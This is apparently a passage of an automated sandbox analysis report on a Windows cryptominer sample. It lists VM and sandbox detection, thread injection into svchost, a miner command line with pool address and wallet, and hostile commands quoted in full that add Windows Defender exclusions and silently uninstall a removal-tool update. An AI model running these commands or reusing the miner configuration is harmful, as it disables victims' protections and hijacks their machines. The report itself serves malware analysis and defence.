          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
          Source: svchost.exe, 0000003B.00000003.2164031962.00000226EC86B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEQTLTRBGPVURODLWL
          Source: svchost.exe, 0000003B.00000002.3313323501.00000226EC89E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXELLL
          Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:443--USER=8B8PNVYSZJOHWKUUNX7PPTKMQWXYGGWR51ZZFDE5WFGDGYV9XHLVKXAHSZA7RSHMD8PU2VNY9HRPBCQFUFE1IZ5BCZVZHFZ--PASS=6238110659--CPU-MAX-THREADS-HINT=40--CINIT-WINRING=GDTMKVYHYSUY.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.0--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=80--CINIT-ID=QTLTRBGPVURODLWL
          Source: svchost.exe, 0000003B.00000003.2164031962.00000226EC86B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003B.00000002.3313323501.00000226EC89E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC82F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEBUFFERPOOL.HAS
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4400Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5383Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5470Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4266Jump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeDropped PE file which has not been started: C:\Windows\Temp\gdtmkvyhysuy.sysJump to dropped file
          Source: C:\Windows\System32\conhost.exeAPI coverage: 0.9 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 4400 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 5383 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep count: 5470 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep count: 4266 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
          Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
          Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
          Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: svchost.exe, 0000003B.00000002.3313257725.00000226EC86B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMSAFD L2CAP [Bluetooth]=j
          Source: svchost.exe, 0000003B.00000002.3313207679.00000226EC85E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 0000003B.00000002.3313163287.00000226EC813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\conhost.exeCode function: 56_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,56_2_0000000140001160

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeThread register set: target process: 7604Jump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeThread register set: target process: 7636Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
